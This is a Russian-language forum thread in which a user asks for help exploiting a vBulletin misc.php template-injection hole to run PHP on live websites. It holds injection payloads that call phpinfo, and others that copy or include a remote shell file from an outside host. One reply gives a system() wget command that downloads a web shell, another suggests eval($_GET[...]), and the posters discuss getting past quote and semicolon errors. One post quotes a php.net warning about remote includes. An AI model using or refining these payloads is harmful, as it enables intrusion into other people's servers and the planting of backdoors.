Вобщем пользовался уязвимостью для вбулки для выполнения пхп команд на сайте, вот он: /misc.php?do=page&template={${phpinfo}} Пхпинфо конечно же отлично работает я решил попробывать функцию copy: /misc.php?do=page&template={${copy('http://sait/shell.txt','s.php');}} Но выдало ошибкуarse error: syntax error, unexpected '%', expecting ')' in Я потом попробывал Get: /misc.php?do=page&template={${include($_GET[aa]);&aa=http://mypet-style.ru/backup/1/shell.txt}} И получил ошибкуarse error: syntax error, unexpected ';' in ... Как это обойти, да и что он от меня вобще хочет? Убераю точку с запятой в запросе, тогда ему не нравиться знак ровно. Вобщем на одном сайте только получилось с GET а на всех остальных syntax error ... Посоветуйте что нибудь?
О_о Он как бэ говорит тебе... Учи Английский,php и гугл В первом приведенном случае, может не работать с url. Во втором случае у тебя вообще ошибка. Я ничего не знаю о этой дырке в булке, но могу предложить попытаться вызвать через system. Code: system('wget http://site.com/shell.php -O /путь/shell.php'); Это в случае если не отключена. System можно заменить аналогами. +Уязвимость как бэ говорит что в конце не надо ставить - ; На примере вызова phpinfo()
Ошибка с % как раз и получается из за скобок вернее из за ' поэтому и нужен GET, с чего бы запрос не правельный? я же сказал на одном все удачно, а на других лажа ...
I would like to emphasize the danger of remote includes. For example: Suppose, we have a server A with Linux and PHP 4.3.0 or greater installed which has the file index.php with the following code: <?php // File: index.php include ($_GET['id'].".php"); ?> This is, of course, not a very good way to program, but i actually found a program doing this. Then, we hava a server B, also Linux with PHP installed, that has the file list.php with the following code: <?php // File: list.php $output = ""; exec("ls -al",$output); foreach($output as $line) { echo $line . "<br>\n"; } ?> If index.php on Server A is called like this: http://server_a/index.php?id=http://server_b/list then Server B will execute list.php and Server A will include the output of Server B, a list of files. But here's the trick: if Server B doesn't have PHP installed, it returns the file list.php to Server A, and Server A executes that file. Now we have a file listing of Server A! I tried this on three different servers, and it allways worked. This is only an example, but there have been hacks uploading files to servers etc. So, allways be extremely carefull with remote includes. (c) http://php.net/manual/en/function.include.php
Сравни твою конструкцию и ту что я привел. Есть разница? А в чем? Вторая ошибка. Если ты хочешь передать параметр после &, то он должен у тебя быть вне скрипта исполняемого,ога. Однако можно просто перед инклудом присвоить значение переменной и передать её в инклуд без ГЕТа. Короче, вариантов уйма. Воспользуйся поиском
Это из другой оперы похоже ты вобще все не так понял ... Если бы у меня был доступ к редактированию файла misc.php то зачем мне вобще все эти махинации я бы и так шелл залил ... Единственный скрипт который я могу использовать в этой уязвимости это вставленный {${сюда}} и он не должен содержать скобки вида " и '
Одна фигня запросы запороты. Мда...я то все правильно понял. Почему тогда не сделать eval($_GET[5]); ?